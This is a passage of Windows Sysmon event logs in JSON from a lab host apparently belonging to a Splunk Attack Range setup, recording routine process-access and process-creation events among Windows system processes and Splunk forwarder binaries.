{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03AE-5F25-0000-001037FE0A00}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03AE-5F25-0000-001037FE0A00}","TargetProcessId":"3344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.723\r\nSourceProcessGUID: {A837DB8D-03AE-5F25-0000-001037FE0A00}\r\nSourceProcessId: 3344\r\nSourceThreadId: 5012\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.723","SourceProcessGUID":"{A837DB8D-03AE-5F25-0000-001037FE0A00}","SourceProcessId":"3344","SourceThreadId":"5012","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.693\r\nProcessGuid: {A837DB8D-03AF-5F25-0000-001089000B00}\r\nProcessId: 2856\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.693","ProcessGuid":"{A837DB8D-03AF-5F25-0000-001089000B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03AF-5F25-0000-001089000B00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03AF-5F25-0000-001089000B00}","TargetProcessId":"2856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03AF-5F25-0000-001089000B00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03AF-5F25-0000-001089000B00}","TargetProcessId":"2856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+28